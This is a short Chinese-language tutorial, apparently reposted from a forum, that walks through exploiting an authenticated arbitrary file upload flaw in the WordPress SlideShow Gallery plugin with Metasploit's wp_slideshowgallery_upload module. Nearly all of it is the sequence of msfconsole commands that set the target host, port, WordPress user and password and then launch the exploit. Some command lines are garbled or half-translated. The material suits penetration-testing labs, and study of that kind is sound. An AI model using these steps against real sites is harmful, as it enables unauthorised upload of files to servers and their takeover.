利用WordPress插件SlideShow Gallery的绕过身份验证的文件上传漏洞进行测试

WordPress SlideShow Gallery插件包含经过身份验证的文件上传漏洞。攻击者可以将任意文件上传到上传文件夹。由于插件使用自己的文件上传机制而不是WordPress API,因此可以上传任何文件类型。 利用目标
WordPress的
需求
攻击者:kali Linux
受害者PC:WordPress
打开Kali终端类型  msfconsole

现在输入  exploit use / unix / webapp / wp_slideshowgallery_upload
msf exploit  (wp_slideshowgallery_upload)> set targeturi /
msf exploitwp_slideshowgallery_upload)> set rhost 192.168.0.10 4  (远程主机的IP)
msf exploitwp_slideshowgallery_upload)> set rport 80
msf exploitwp_slideshowgallery_upload)> 设置wp_user用户
msf exploitwp_slideshowgallery_upload)> 设置wp_password bitnami
msf exploitwp_slideshowgallery_upload)> exploit        
转载请注明本文链接: http://www.mayidui.net/t2324.html
游客
登录后才可以回帖,登录 或者 注册